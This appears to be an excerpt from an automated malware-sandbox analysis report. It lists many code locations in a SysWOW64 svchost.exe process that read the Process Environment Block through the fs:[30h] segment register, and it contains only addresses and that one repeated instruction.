            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]1_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]1_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
